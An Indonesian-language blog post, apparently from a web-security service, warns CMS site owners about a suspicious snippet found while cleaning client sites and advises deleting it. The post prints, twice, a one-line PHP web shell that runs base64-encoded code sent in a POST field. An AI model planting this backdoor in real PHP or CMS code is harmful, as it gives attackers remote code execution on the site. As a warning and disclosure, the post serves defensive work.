Dari hasil penelusuran pembersihan malware website klien yang mempercayakan tugas keamanan website ini kepada Aditif!Net ditemukan kode aneh yang tidak biasa ada dalam CMS sepertiWordPress, Joomla, Oscommerce, Drupal, Moodle dkk.
Ini adalah kode aneh yang ditemukan serta patut dicurigai keberadaannya.
<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>
<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>
Karena kode tersebut dirasa asing dalam sebuah template CMS, maka Aditif!Net melakukan inkubasi untuk segera dianalisa dan ditemukan untuk apa sebenarnya kode itu…..
Setelah proses penelusuran yang lama dan melelahkan juga berdasarkan referensi-referensikeamanan website, disimpulkan bahwa kode itu adalah kode asing yang disisipkan oleh pihak luar ke dalam CMS tersebut. Maka, hasil akhir proses disimpulkan bahwa kode tersebut harus segera dihapus dari seluruh file CMS.
Selesai.
Bagi anda yang menemukan kode tersebut, sebaiknya berhati-hati dan tingkatkan keadaan dariWASPADA menjadi GAWAT DARURAT!!!
Salam,
Aditif!Net